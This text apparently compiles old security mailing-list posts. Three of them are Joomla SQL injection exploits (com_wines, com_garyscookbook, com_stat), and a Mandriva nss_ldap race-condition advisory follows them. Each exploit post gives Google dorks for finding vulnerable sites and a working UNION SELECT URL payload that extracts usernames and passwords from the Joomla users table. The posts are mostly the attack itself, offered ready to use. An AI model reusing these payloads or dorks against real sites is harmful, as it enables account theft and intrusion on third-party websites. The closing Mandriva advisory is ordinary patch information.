### # # joomla com_wines SQL Injection(id) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl:"com_wines" # # DORK 2 : allinurl: com_wines "detail" # EXPLOIT : index.php?option=com_wines&[EMAIL PROTECTED]&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
joomla com_garyscookbook SQL Injection(id)
### # # joomla com_garyscookbook SQL Injection(id) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl:"com_garyscookbook" # # DORK 2 : allinurl: com_garyscookbook "detail" # EXPLOIT : index.php?option=com_garyscookbook&[EMAIL PROTECTED]&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
Joomla com_stat "id" Remote SQL Injection
Aria-Security Team (Persian Security Network) http://Aria-Security.Net --- Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N, Joomla com_stat "id" Remote SQL Injection index.php?option=com_stats&opt=viewteam&id=-10010111/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/jos_users/* (Original Advisory@ http://forum.aria-security.net/showthread.php?p=1465) AurA Aria-Security Team (Credits to Aria-Security Team)
[ MDVSA-2008:049 ] - Updated nss_ldap package fixes race condition allowing user data theft
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:049 http://www.mandriva.com/security/ ___ Package : nss_ldap Date: February 25, 2008 Affected: 2007.0, Corporate 4.0 ___ Problem Description: A race condition in nss_ldap, when used in applications that use pthread and fork after a call to nss_ldap, does not properly handle the LDAP connection, which might cause nss_ldap to return the wrong user data to the wrong process, giving one user access to data belonging to another user, in some cases. The updated package hais been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794 ___ Updated Packages: Mandriva Linux 2007.0: 734883fd4974f083ac6005a56438754b 2007.0/i586/nss_ldap-250-1.1mdv2007.0.i586.rpm 5f11443bb851c8c650c2aa1fa89743bd 2007.0/SRPMS/nss_ldap-250-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: cdcf474742cdbeeb2d8c479a17270195 2007.0/x86_64/nss_ldap-250-1.1mdv2007.0.x86_64.rpm 5f11443bb851c8c650c2aa1fa89743bd 2007.0/SRPMS/nss_ldap-250-1.1mdv2007.0.src.rpm Corporate 4.0: f862188b3f2f11aa03f656dc29bee938 corporate/4.0/i586/nss_ldap-239-3.2.20060mlcs4.i586.rpm 735c052491e2d3943be54bc93cc6fb29 corporate/4.0/SRPMS/nss_ldap-239-3.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 01bc19f756541e2a34943255f75a7ca4 corporate/4.0/x86_64/nss_ldap-239-3.2.20060mlcs4.x86_64.rpm 735c052491e2d3943be54bc93cc6fb29 corporate/4.0/SRPMS/nss_ldap-239-3.2.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHwn1vmqjQ0CJFipgRAhAEAJ9DWufRZ/a2TduRaXQjht/NgV5gnQCfVUZd Ezp/2K3q5VsIlGN6wnLRNYs= =U/Ma -END PGP SIGNATURE-
